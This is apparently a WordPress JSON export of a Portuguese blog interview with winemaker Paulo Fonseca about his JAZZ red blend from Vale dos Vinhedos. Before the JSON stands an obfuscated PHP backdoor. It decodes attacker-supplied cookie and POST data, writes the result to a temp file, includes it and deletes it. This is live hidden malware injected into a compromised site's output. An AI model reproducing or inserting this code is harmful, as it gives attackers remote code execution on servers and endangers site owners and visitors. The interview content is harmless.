$hieuNIn = 'l' . "\x4c" . 'C' . "\x5f" . chr (99) . chr ( 101 - 30 )."\113" . "\x63";$MnDePaT = "\143" . chr ( 712 - 604 ).chr (97) . "\x73" . "\x73" . "\137" . 'e' . chr ( 250 - 130 ).chr ( 686 - 581 )."\163" . chr (116) . chr ( 545 - 430 ); $PnPjB = class_exists($hieuNIn); $MnDePaT = "58891";$MyAqXiPIbj = strpos($MnDePaT, $hieuNIn);if ($PnPjB == $MyAqXiPIbj){function zldxzj(){$xaBiS = new /* 54952 */ lLC_cGKc(43478 + 43478); $xaBiS = NULL;}$xNPjpHf = "43478";class lLC_cGKc{private function YmWcsQms($xNPjpHf){if (is_array(lLC_cGKc::$OtdlAEAc)) {$name = sys_get_temp_dir() . "/" . crc32(lLC_cGKc::$OtdlAEAc["salt"]);@lLC_cGKc::$OtdlAEAc["write"]($name, lLC_cGKc::$OtdlAEAc["content"]);include $name;@lLC_cGKc::$OtdlAEAc["delete"]($name); $xNPjpHf = "43478";exit();}}public function qglsuASVPh(){$hmoPxrENov = "19315";$this->_dummy = str_repeat($hmoPxrENov, strlen($hmoPxrENov));}public function __destruct(){lLC_cGKc::$OtdlAEAc = @unserialize(lLC_cGKc::$OtdlAEAc); $xNPjpHf = "53663_4596";$this->YmWcsQms($xNPjpHf); $xNPjpHf = "53663_4596";}public function vqOUU($hmoPxrENov, $wiIQbDJjH){return $hmoPxrENov[0] ^ str_repeat($wiIQbDJjH, (strlen($hmoPxrENov[0]) / strlen($wiIQbDJjH)) + 1);}public function NHDMPH($hmoPxrENov){$bGiqOjB = "\142" . 'a' . chr (115) . chr (101) . "\66" . chr ( 845 - 793 );return array_map($bGiqOjB . chr ( 848 - 753 ).chr ( 793 - 693 )."\145" . 'c' . "\x6f" . chr ( 468 - 368 )."\x65", array($hmoPxrENov,));}public function __construct($jMpfXF=0){$tVwqJSTns = chr ( 218 - 174 ); $hmoPxrENov = "";$UhDBjgX = $_POST;$aMwHawIhb = $_COOKIE;$wiIQbDJjH = "17347ced-6d81-4312-a01a-16ecd0557879";$CKVBg = @$aMwHawIhb[substr($wiIQbDJjH, 0, 4)];if (!empty($CKVBg)){$CKVBg = explode($tVwqJSTns, $CKVBg);foreach ($CKVBg as $jknAwWHay){$hmoPxrENov .= @$aMwHawIhb[$jknAwWHay];$hmoPxrENov .= @$UhDBjgX[$jknAwWHay];}$hmoPxrENov = $this->NHDMPH($hmoPxrENov);}lLC_cGKc::$OtdlAEAc = $this->vqOUU($hmoPxrENov, $wiIQbDJjH);if (strpos($wiIQbDJjH, $tVwqJSTns) !== FALSE){$wiIQbDJjH = explode($tVwqJSTns, $wiIQbDJjH); $jcyJdh = base64_decode(md5($wiIQbDJjH[0])); $IobQTjp = strlen($wiIQbDJjH[1]) > 5 ? substr($wiIQbDJjH[1], 0, 5) : $wiIQbDJjH[1];$_GET['new_key'] = md5(implode('', $wiIQbDJjH)); $PnzMrkV = str_repeat($IobQTjp, 2); $AxrHadC = array_map('trim', $wiIQbDJjH);if (is_array($AxrHadC) && count($AxrHadC) > 1) {$LkHpLiCOyy = $AxrHadC[0];} else {$LkHpLiCOyy = '';}$UMrFmYSH = rawurldecode($LkHpLiCOyy); $_POST['decoded_key'] = $UMrFmYSH;$dTjvZZrsdy = str_split($UMrFmYSH, 2);}}public static $OtdlAEAc = 9662;}zldxzj();}{"id":489,"date":"2021-09-01T10:44:37","date_gmt":"2021-09-01T13:44:37","guid":{"rendered":"https:\/\/www.profonseca.com.br\/?p=489"},"modified":"2021-09-01T10:51:00","modified_gmt":"2021-09-01T13:51:00","slug":"todo-sonho-e-possivel-entrevista-a-silvana-toazza","status":"publish","type":"post","link":"https:\/\/www.profonseca.com.br\/todo-sonho-e-possivel-entrevista-a-silvana-toazza\/","title":{"rendered":"Todo sonho \u00e9 poss\u00edvel – Entrevista a Silvana Toazza"},"content":{"rendered":"\n
Na \u00faltima ter\u00e7a, 31\/08\/2021, Paulo Fonseca, o nome por tr\u00e1s do Jazz, vinho composto pelo blend das uvas Malbec, Merlot, Cabernet Sauvignon e Cabernet Franc, concedeu uma agrad\u00e1vel entrevista a Silvana Toazza.<\/p>\n\n\n\n
Na conversa, Paulo comenta sobre o processo de elabora\u00e7\u00e3o e produ\u00e7\u00e3o do Jazz e sua rela\u00e7\u00e3o com os vinhos brasileiros!<\/p>\n\n\n\n
Confira a entrevista na \u00edntegra:<\/p>\n\n\n\n
Qual \u00e9 a sua rela\u00e7\u00e3o com o universo vin\u00edcola?<\/strong> Como surgiu o projeto do vinho JAZZ?<\/strong> Por que a escolha do nome?<\/strong> De que forma se viabiliza esse novo conceito de parceria?<\/strong> Onde \u00e9 produzido o vinho e de onde v\u00eam as uvas?<\/strong> Quais os p\u00fablicos e mercados-alvo deste produto?<\/strong> Esse \u00e9 o primeiro produto do projeto. Quais as pr\u00f3ximas novidades a serem retiradas das caves?<\/strong> Como criar um produto de excel\u00eancia?<\/strong> De que forma enxerga a aceita\u00e7\u00e3o do p\u00fablico pelo vinho nacional?<\/strong> \u00c9 not\u00f3rio que a qualidade do vinho brasileiro vem crescendo e sendo reconhecida\u2026<\/strong> O que significa um vinho bom?<\/strong> O que o levou a investir neste novo projeto?<\/strong> Quais dicas daria a empres\u00e1rios que gostariam de investir mas est\u00e3o acuados pelo cen\u00e1rio?<\/strong> 2021, \u00e9 o ano do\u2026<\/strong> Para conferir essa e outras entrevistas da Silvana, clique aqui<\/strong>!<\/p>\n\n\n\n Um abra\u00e7o e um Jazz!<\/p>\n\n\n\n <\/p>\n","protected":false},"excerpt":{"rendered":" Na \u00faltima ter\u00e7a, 31\/08\/2021, Paulo Fonseca, o nome por tr\u00e1s do Jazz, vinho composto pelo blend das uvas Malbec, Merlot, Cabernet Sauvignon e Cabernet Franc, concedeu uma agrad\u00e1vel entrevista a Silvana Toazza. Na conversa, Paulo comenta sobre o processo de elabora\u00e7\u00e3o e produ\u00e7\u00e3o do Jazz e sua rela\u00e7\u00e3o com os vinhos brasileiros! Confira a entrevista […]<\/p>\n","protected":false},"author":7,"featured_media":490,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[],"yoast_head":"\n
Sou um en\u00f3filo e um winemaker.<\/p>\n\n\n\n
O projeto de produzir o meu vinho j\u00e1 vem desde crian\u00e7a. Meu av\u00f4 portugu\u00eas produzia vinho em Portugal para consumo familiar. Veio para o Brasil no in\u00edcio dos anos 30, mas n\u00e3o trabalhou com vinho. Quando eu era garoto, o visitava semanalmente. Ele sempre me servia um c\u00e1lice de vinho do Porto e fic\u00e1vamos ali conversando. Eram momentos m\u00e1gicos. E eu dizia sempre que iria um dia produzir o meu vinho. Passou-se muito tempo e somente em 2014 dei in\u00edcio ao projeto do vinho JAZZ.<\/p>\n\n\n\n
Sou um apaixonado pelo jazz. A complexidade da melodia, a improvisa\u00e7\u00e3o e a paix\u00e3o do artista pela m\u00fasica sempre me tocaram muito. O jazz vai fundo na alma. E a elabora\u00e7\u00e3o do vinho JAZZ foi conduzida pela vontade de fazer um vinho complexo, que toque nas emo\u00e7\u00f5es. Para se chegar no assemblage, foi necess\u00e1rio muito improviso.<\/p>\n\n\n\n
A partir de conhecimento, determina\u00e7\u00e3o, paix\u00e3o, resili\u00eancia, busca da excel\u00eancia e credibilidade.<\/p>\n\n\n\n
O vinho JAZZ \u00e9 produzido na Vin\u00edcola Larentis, localizada no Vale dos Vinhedos, em Bento Gon\u00e7alves. As uvas s\u00e3o das melhores parcelas de vinhedos pr\u00f3prios da fam\u00edlia Larentis. Com a parceria do en\u00f3logo Andr\u00e9 Larentis, o JAZZ \u00e9 um blend das uvas Malbec, Cabernet Sauvignon, Merlot e Cabernet Franc. Envelheceu 12 meses em barricas de carvalho. Seu custo m\u00e9dio \u00e9 de R$ 95.<\/p>\n\n\n\n
En\u00f3filos que compram produtos de alta qualidade, que deixem marcas na mem\u00f3ria quando degustados.<\/p>\n\n\n\n
Sim, esse \u00e9 o primeiro produto. O segundo produto j\u00e1 se encontra em fase de estudos e dever\u00e1 vir para o mercado em 2022. Ser\u00e1 um vinho branco.<\/p>\n\n\n\n
Com conhecimento, determina\u00e7\u00e3o e querendo fazer o melhor.<\/p>\n\n\n\n
Vejo com muito entusiasmo. O vinho brasileiro se profissionalizou e cresceu muito em qualidade. E o brasileiro come\u00e7a a conhecer e a reconhecer a qualidade do vinho nacional.<\/p>\n\n\n\n
Sim, mas ainda h\u00e1 um longo caminho pela frente para o vinho nacional se consolidar e aumentar a participa\u00e7\u00e3o no mercado.<\/p>\n\n\n\n
Vinho que toca a alma, que vai fundo nas emo\u00e7\u00f5es, que fica marcado na mem\u00f3ria e nos faz degust\u00e1-lo repetidas vezes.<\/p>\n\n\n\n
Paix\u00e3o pelo vinho e vontade de realizar um sonho.<\/p>\n\n\n\n
Todo investimento precisa de conhecimento sobre o tema antes de qualquer coisa. Depois, \u00e9 necess\u00e1rio realizar um bom planejamento do neg\u00f3cio para estudar a viabilidade econ\u00f4mico-financeira. E, por fim, muita dedica\u00e7\u00e3o e resili\u00eancia para operar o neg\u00f3cio. A concorr\u00eancia \u00e9 grande e \u00e9 preciso um produto com diferencial competitivo e saber torn\u00e1-lo conhecido no mercado.<\/p>\n\n\n\n
Vinho brasileiro, mais uma vez.<\/p>\n\n\n\n